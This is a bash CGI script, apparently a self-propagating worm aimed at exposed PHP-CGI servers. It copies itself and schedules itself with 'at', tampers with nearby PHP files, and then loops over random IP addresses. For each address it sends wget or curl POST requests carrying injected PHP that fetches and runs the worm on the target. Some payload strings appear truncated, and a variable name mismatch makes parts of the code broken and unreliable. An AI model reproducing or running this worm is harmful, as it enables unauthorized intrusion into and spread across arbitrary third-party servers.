#!/bin/bash echo -n "Content-length: "; echo -n `cat worm.cgi | wc -c`; echo -n "\r\n"; echo -n "Content-type: text/plain\r\n\r\n"; cat worm.cgi; DIR=`pwd`; ME=`hostname`; PHP=`which php`; chmod a+rx ${DIR}/worm.cgi; cp $PHP $DIR > /dev/null; at -t "00:00:00" -f "${DIR}/worm.cgi"; echo "" >> ../*.php; echo "" >> .././*.php; echo "" >> ../../../*.php; # UNCOMMENT CODE BELOW TO NOT RUN IN THE BACKGROUND #echo -n "" > ${DIR}/worm.token; if [ -f ${DIR}/worm.token ]; then rm -f ${DIR}/worm.token; while true; do rm -f ${DIR}/worm.token; value=${RANDOM}; a=`expr $value % 256`; value=${RANDOM}; b=`expr $value % 256`; value=${RANDOM}; c=`expr $value % 256`; value=${RANDOM}; d=`expr $value % 256`; REMOTE_SYSTEM="${a}.${b}.${c}.${d}"; echo ${REMOTE_SYSTEM}; if which wget > /dev/null; then wget -O /dev/null --post-data " /dev/null && /bin/sh ./worm.cgi > /dev/null &'); ?>" "http://${REMOTE_HOST}/phppath/php" > /dev/null & wget -O /dev/null --post-data " /dev/null && /bin/sh ./worm.cgi > /dev/null &'); ?>" "http://${REMOTE_HOST}/phppath/php" > /dev/null & echo "" > /dev/null; elif which curl > /dev/null; then curl -X POST -o /dev/null --data " /dev/null && /bin/sh ./worm.cgi > /dev/null &'); ?>" "http://${REMOTE_HOST}/phppath/php" > /dev/null & curl -X POST -o /dev/null --data " /dev/null && /bin/sh ./worm.cgi > /dev/null &'); ?>" "http://${REMOTE_HOST}/phppath/php" > /dev/null & echo "" > /dev/null; fi done else echo -n "" > ${DIR}/worm.token; /bin/sh ./worm.cgi > /dev/null & fi exit 0;